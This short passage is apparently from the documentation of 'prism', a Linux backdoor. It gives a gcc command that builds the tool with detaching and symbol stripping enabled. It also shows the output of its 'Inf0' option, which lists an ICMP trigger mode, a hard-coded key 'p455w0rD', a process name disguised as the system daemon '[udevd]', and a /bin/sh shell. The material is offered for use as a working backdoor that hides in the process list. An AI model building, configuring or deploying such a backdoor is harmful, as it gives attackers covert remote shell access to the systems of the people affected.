gcc -DDETACH -m32 -Wall -s -o prism prism.c
Backdoor building information
The backdoor ignore any command line parameter, except the Inf0 (the last char is a digit).
This option allow you to see some information about the backdoor:
$ ./prism Inf0
Version: 0.5
Mode: icmp
Key: p455w0rD
Process name: [udevd]
Shell: /bin/sh
Detach: Yes
Flush Iptables: No